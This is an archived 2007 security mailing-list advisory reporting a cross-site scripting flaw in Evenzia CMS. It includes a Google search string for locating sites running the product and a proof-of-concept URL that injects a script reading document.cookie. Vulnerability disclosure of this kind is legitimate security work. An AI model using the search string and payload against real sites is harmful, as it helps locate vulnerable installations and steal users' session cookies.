|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
Evenzia CMS XSS
glafkos
infosec.org.uk
Date: Fri Jun 01 2007 - 11:58:16 CDT
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
Application: Evenzia CMS
Vendors Url: http://www.evenzia.com
Bug Type: Cross-Site Script
Exploitation: Remote
Introduction: Evenzia CMS is a web-based CMS system
Google Dork: "Powered By eVenzia CMS" || "Developed By eVenzia"
PoC:
http://www.test.com/includes/send.inc.php/>'>><script>alert(document.cookie)</script>
Credits:
Glafkos Charalambous
glafkos (at) infosec (dot) org (dot) uk
Information Security Uncensored
InfoSEC.org.uk
June 1st, 2007
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]